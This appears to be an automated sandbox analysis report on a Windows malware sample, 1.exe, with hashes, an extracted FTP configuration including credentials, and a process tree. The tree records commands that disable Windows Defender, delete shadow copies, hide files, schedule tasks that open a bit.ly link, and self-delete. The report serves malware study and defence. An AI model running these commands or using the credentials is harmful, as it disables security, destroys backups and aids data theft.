Analysis
-
max time kernel
1200s -
max time network
1199s -
platform
windows10-1703_x64 -
resource
win10-20240611-en -
resource tags
arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system -
submitted
19/06/2024, 22:08
Static task
static1
Behavioral task
behavioral1
Sample
1.exe
Resource
win10-20240611-en
Behavioral task
behavioral2
Sample
1.exe
Resource
win10v2004-20240611-en
Behavioral task
behavioral3
Sample
1.exe
Resource
win11-20240508-en
General
-
Target
1.exe
-
Size
275KB
-
MD5
b61525d88761a974e57c8257c76ec999
-
SHA1
231893b80d83f297ebdc760d4a1388afd98a4dd6
-
SHA256
6abd97d20372a17384c5fd928ef5548da218b615247276acd7bf0a62ad3cf6e7
-
SHA512
0ab047b99ef446056fac3f45b62c1c65fc8675c2fff938ba3c88fe600aa969b030b2d1474bece5305e40a2220fbbdaeb0584a1630fce3b53535bb9a27ee6b53c
-
SSDEEP
6144:ITR3vnpRfE/UVPy/oCa+LDZWC9z5KIFXWBHdZ6Nba09IdkaNiTN:I3vnpRfzPygCa+DZvXWP09IGC2
Malware Config
Extracted
Protocol: ftp- Host:
ftp.encompossoftware.com - Port:
21 - Username:
remoteuser - Password:
Encomposx99
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 1.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" 1.exe -
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" svchost.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" svchost.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Executes dropped EXE 1 IoCs
pid Process 5308 svchost.exe -
Drops desktop.ini file(s) 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\LinkM\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Roaming\LinkM\desktop.ini 1.exe File opened for modification C:\Users\Admin\AppData\Roaming\LinkM\desktop.ini 1.exe -
Enumerates connected drives 3 TTPs 15 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 2 iplogger.org 3 iplogger.org 12 pastebin.com 16 pastebin.com 29 pastebin.com -
Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
pid Process 1672 cmd.exe 212 cmd.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\rescache\_merged\1601268389\715946058.pri taskmgr.exe File created C:\Windows\rescache\_merged\4183903823\2290032291.pri taskmgr.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.
-
Interacts with shadow copies 3 TTPs 12 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5280 vssadmin.exe 5348 vssadmin.exe 5356 vssadmin.exe 5340 vssadmin.exe 5332 vssadmin.exe 5304 vssadmin.exe 5292 vssadmin.exe 5204 vssadmin.exe 5272 vssadmin.exe 5320 vssadmin.exe 5392 vssadmin.exe 5404 vssadmin.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5836 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5664 schtasks.exe 4188 schtasks.exe 2148 schtasks.exe 5140 schtasks.exe 5444 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4268 1.exe 4268 1.exe 4268 1.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 2468 powershell.exe 2468 powershell.exe 2468 powershell.exe 4500 taskmgr.exe 4500 taskmgr.exe 3736 powershell.exe 3736 powershell.exe 4500 taskmgr.exe 4500 taskmgr.exe 2904 powershell.exe 2904 powershell.exe 3536 powershell.exe 3536 powershell.exe 3540 powershell.exe 3540 powershell.exe 4504 powershell.exe 4504 powershell.exe 3296 powershell.exe 3296 powershell.exe 4148 powershell.exe 4148 powershell.exe 3160 powershell.exe 3160 powershell.exe 3540 powershell.exe 3092 powershell.exe 3092 powershell.exe 1688 powershell.exe 1688 powershell.exe 560 powershell.exe 560 powershell.exe 4148 powershell.exe 3736 powershell.exe 3736 powershell.exe 3540 powershell.exe 640 powershell.exe 640 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4500 taskmgr.exe Token: SeSystemProfilePrivilege 4500 taskmgr.exe Token: SeCreateGlobalPrivilege 4500 taskmgr.exe Token: SeDebugPrivilege 4268 1.exe Token: SeDebugPrivilege 2468 powershell.exe Token: SeIncreaseQuotaPrivilege 2468 powershell.exe Token: SeSecurityPrivilege 2468 powershell.exe Token: SeTakeOwnershipPrivilege 2468 powershell.exe Token: SeLoadDriverPrivilege 2468 powershell.exe Token: SeSystemProfilePrivilege 2468 powershell.exe Token: SeSystemtimePrivilege 2468 powershell.exe Token: SeProfSingleProcessPrivilege 2468 powershell.exe Token: SeIncBasePriorityPrivilege 2468 powershell.exe Token: SeCreatePagefilePrivilege 2468 powershell.exe Token: SeBackupPrivilege 2468 powershell.exe Token: SeRestorePrivilege 2468 powershell.exe Token: SeShutdownPrivilege 2468 powershell.exe Token: SeDebugPrivilege 2468 powershell.exe Token: SeSystemEnvironmentPrivilege 2468 powershell.exe Token: SeRemoteShutdownPrivilege 2468 powershell.exe Token: SeUndockPrivilege 2468 powershell.exe Token: SeManageVolumePrivilege 2468 powershell.exe Token: 33 2468 powershell.exe Token: 34 2468 powershell.exe Token: 35 2468 powershell.exe Token: 36 2468 powershell.exe Token: SeDebugPrivilege 3736 powershell.exe Token: SeDebugPrivilege 3160 powershell.exe Token: SeDebugPrivilege 2904 powershell.exe Token: SeDebugPrivilege 3536 powershell.exe Token: SeDebugPrivilege 3540 powershell.exe Token: SeDebugPrivilege 4504 powershell.exe Token: SeDebugPrivilege 3296 powershell.exe Token: SeDebugPrivilege 4148 powershell.exe Token: 33 4500 taskmgr.exe Token: SeIncBasePriorityPrivilege 4500 taskmgr.exe Token: SeDebugPrivilege 3092 powershell.exe Token: SeDebugPrivilege 1688 powershell.exe Token: SeDebugPrivilege 560 powershell.exe Token: SeDebugPrivilege 640 powershell.exe Token: SeBackupPrivilege 5608 vssvc.exe Token: SeRestorePrivilege 5608 vssvc.exe Token: SeAuditPrivilege 5608 vssvc.exe Token: SeIncreaseQuotaPrivilege 3540 powershell.exe Token: SeSecurityPrivilege 3540 powershell.exe Token: SeTakeOwnershipPrivilege 3540 powershell.exe Token: SeLoadDriverPrivilege 3540 powershell.exe Token: SeSystemProfilePrivilege 3540 powershell.exe Token: SeSystemtimePrivilege 3540 powershell.exe Token: SeProfSingleProcessPrivilege 3540 powershell.exe Token: SeIncBasePriorityPrivilege 3540 powershell.exe Token: SeCreatePagefilePrivilege 3540 powershell.exe Token: SeBackupPrivilege 3540 powershell.exe Token: SeRestorePrivilege 3540 powershell.exe Token: SeShutdownPrivilege 3540 powershell.exe Token: SeDebugPrivilege 3540 powershell.exe Token: SeSystemEnvironmentPrivilege 3540 powershell.exe Token: SeRemoteShutdownPrivilege 3540 powershell.exe Token: SeUndockPrivilege 3540 powershell.exe Token: SeManageVolumePrivilege 3540 powershell.exe Token: 33 3540 powershell.exe Token: 34 3540 powershell.exe Token: 35 3540 powershell.exe Token: 36 3540 powershell.exe -
Suspicious use of FindShellTrayWindow 53 IoCs
pid Process 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe -
Suspicious use of SendNotifyMessage 52 IoCs
pid Process 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe 4500 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4268 wrote to memory of 1672 4268 1.exe 73 PID 4268 wrote to memory of 1672 4268 1.exe 73 PID 1672 wrote to memory of 4732 1672 cmd.exe 75 PID 1672 wrote to memory of 4732 1672 cmd.exe 75 PID 1672 wrote to memory of 4180 1672 cmd.exe 76 PID 1672 wrote to memory of 4180 1672 cmd.exe 76 PID 4268 wrote to memory of 2468 4268 1.exe 77 PID 4268 wrote to memory of 2468 4268 1.exe 77 PID 4268 wrote to memory of 3736 4268 1.exe 80 PID 4268 wrote to memory of 3736 4268 1.exe 80 PID 4268 wrote to memory of 3540 4268 1.exe 82 PID 4268 wrote to memory of 3540 4268 1.exe 82 PID 4268 wrote to memory of 2904 4268 1.exe 83 PID 4268 wrote to memory of 2904 4268 1.exe 83 PID 4268 wrote to memory of 3160 4268 1.exe 86 PID 4268 wrote to memory of 3160 4268 1.exe 86 PID 4268 wrote to memory of 3536 4268 1.exe 88 PID 4268 wrote to memory of 3536 4268 1.exe 88 PID 4268 wrote to memory of 4504 4268 1.exe 90 PID 4268 wrote to memory of 4504 4268 1.exe 90 PID 4268 wrote to memory of 3296 4268 1.exe 92 PID 4268 wrote to memory of 3296 4268 1.exe 92 PID 4268 wrote to memory of 4148 4268 1.exe 94 PID 4268 wrote to memory of 4148 4268 1.exe 94 PID 4268 wrote to memory of 560 4268 1.exe 96 PID 4268 wrote to memory of 560 4268 1.exe 96 PID 4268 wrote to memory of 1688 4268 1.exe 97 PID 4268 wrote to memory of 1688 4268 1.exe 97 PID 4268 wrote to memory of 640 4268 1.exe 99 PID 4268 wrote to memory of 640 4268 1.exe 99 PID 4268 wrote to memory of 3092 4268 1.exe 100 PID 4268 wrote to memory of 3092 4268 1.exe 100 PID 4268 wrote to memory of 3604 4268 1.exe 101 PID 4268 wrote to memory of 3604 4268 1.exe 101 PID 4268 wrote to memory of 3004 4268 1.exe 102 PID 4268 wrote to memory of 3004 4268 1.exe 102 PID 4268 wrote to memory of 1964 4268 1.exe 103 PID 4268 wrote to memory of 1964 4268 1.exe 103 PID 4268 wrote to memory of 4036 4268 1.exe 104 PID 4268 wrote to memory of 4036 4268 1.exe 104 PID 4268 wrote to memory of 3088 4268 1.exe 105 PID 4268 wrote to memory of 3088 4268 1.exe 105 PID 4268 wrote to memory of 1104 4268 1.exe 106 PID 4268 wrote to memory of 1104 4268 1.exe 106 PID 4268 wrote to memory of 4776 4268 1.exe 107 PID 4268 wrote to memory of 4776 4268 1.exe 107 PID 4268 wrote to memory of 3764 4268 1.exe 108 PID 4268 wrote to memory of 3764 4268 1.exe 108 PID 4268 wrote to memory of 2460 4268 1.exe 109 PID 4268 wrote to memory of 2460 4268 1.exe 109 PID 4268 wrote to memory of 4264 4268 1.exe 110 PID 4268 wrote to memory of 4264 4268 1.exe 110 PID 4268 wrote to memory of 4656 4268 1.exe 111 PID 4268 wrote to memory of 4656 4268 1.exe 111 PID 4268 wrote to memory of 3564 4268 1.exe 112 PID 4268 wrote to memory of 3564 4268 1.exe 112 PID 4268 wrote to memory of 5096 4268 1.exe 113 PID 4268 wrote to memory of 5096 4268 1.exe 113 PID 3004 wrote to memory of 4480 3004 cmd.exe 130 PID 3004 wrote to memory of 4480 3004 cmd.exe 130 PID 2460 wrote to memory of 5204 2460 cmd.exe 131 PID 2460 wrote to memory of 5204 2460 cmd.exe 131 PID 3604 wrote to memory of 5272 3604 cmd.exe 132 PID 3604 wrote to memory of 5272 3604 cmd.exe 132 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 4732 attrib.exe 4180 attrib.exe 5300 attrib.exe 3772 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies security service
- Drops desktop.ini file(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4268 -
C:\Windows\SYSTEM32\cmd.execmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D2⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\system32\attrib.exeattrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"3⤵
- Views/modifies file attributes
PID:4732
-
-
C:\Windows\system32\attrib.exeattrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D3⤵
- Views/modifies file attributes
PID:4180
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3536
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 62⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3296
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 02⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 62⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 62⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3092
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin Delete Shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:5272
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\system32\vssadmin.exevssadmin resize shadow /for=c: /on=c: /maxsize=401MB3⤵PID:4480
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵PID:1964
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:5392
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵PID:4036
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5292
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵PID:3088
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5304
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵PID:1104
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5356
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵PID:4776
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5332
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵PID:3764
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5404
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5204
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵PID:4264
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5280
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵PID:4656
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5348
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵PID:3564
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5340
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c Vssadmin delete shadowstorage /all /quiet2⤵PID:5096
-
C:\Windows\system32\vssadmin.exeVssadmin delete shadowstorage /all /quiet3⤵
- Interacts with shadow copies
PID:5320
-
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "02:39" /sc daily /mo "2" /tn "Intel TXE" /tr "'explorer'http://bit.ly/2Q7XObq"2⤵
- Scheduled Task/Job: Scheduled Task
PID:5444
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "00:05" /sc daily /mo "3" /tn "Intel TXE" /tr "'explorer'http://bit.ly/2Q7XObq"2⤵
- Scheduled Task/Job: Scheduled Task
PID:5140
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "20:19" /sc daily /mo "2" /tn "Intel TXE" /tr "'explorer'http://bit.ly/2Q7XObq"2⤵
- Scheduled Task/Job: Scheduled Task
PID:5664
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "16:35" /sc weekly /mo "3" /d "Sat" /tn "Intel TXE" /tr "'explorer'http://bit.ly/2Q7XObq"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2148
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "08:34" /sc monthly /m "aug" /tn "Intel TXE" /tr "'explorer'http://bit.ly/2Q7XObq"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4188
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c ping 0 -n 2 & del "C:\Users\Admin\AppData\Local\Temp\1.exe"2⤵PID:556
-
C:\Windows\system32\PING.EXEping 0 -n 23⤵
- Runs ping.exe
PID:5836
-
-
-
C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"2⤵
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Drops desktop.ini file(s)
PID:5308 -
C:\Windows\SYSTEM32\cmd.execmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D3⤵
- Hide Artifacts: Hidden Files and Directories
PID:212 -
C:\Windows\system32\attrib.exeattrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"4⤵
- Views/modifies file attributes
PID:5300
-
-
C:\Windows\system32\attrib.exeattrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D4⤵
- Views/modifies file attributes
PID:3772
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4500
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5608
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1Windows Management Instrumentation
1Persistence
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Direct Volume Access
1Hide Artifacts
4Hidden Files and Directories
4Impair Defenses
2Disable or Modify Tools
2Indicator Removal
2File Deletion
2Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
Filesize
1KB
MD5aceeffc4dc3ea66c804cb1c296f0ba42
SHA180e30f0547bb7c1aa00cf704cc2b2fb68bb3b914
SHA2562c2f947ed23f9d7a9c5a3b8ea581034d919c2fa66d941c1c320f73c0eb0a5159
SHA512a4aff8b8ecbb48ea232940a154fe1bb180d80d05d8dfaca3c2c6885a589c36a2a4b5c8def7e2d3b2bc1214b93be1d158e140b3b7413db1fe1cd0bd93c9e9fd52
-
Filesize
1KB
MD50ffcbed36512e6246c9b86eb2735480d
SHA1dee6c5ab9aa47b42f291a364d52a137c010cd8bf
SHA256fa3dca6c7f0185d577f214b7d5fc8616e84e10dccb466f3f4af8d8243e7cba38
SHA51203e4508f558d4a53db5bec5e2192dd140795dacc2790a7915fcca3669bf7f77fb3a102d3468e03b2e4edb246533712fe6d04af6b5f88465c9c8c5ecd2f6cef02
-
Filesize
1KB
MD5de034f7e32dc04b2279c9ef6f62bff1c
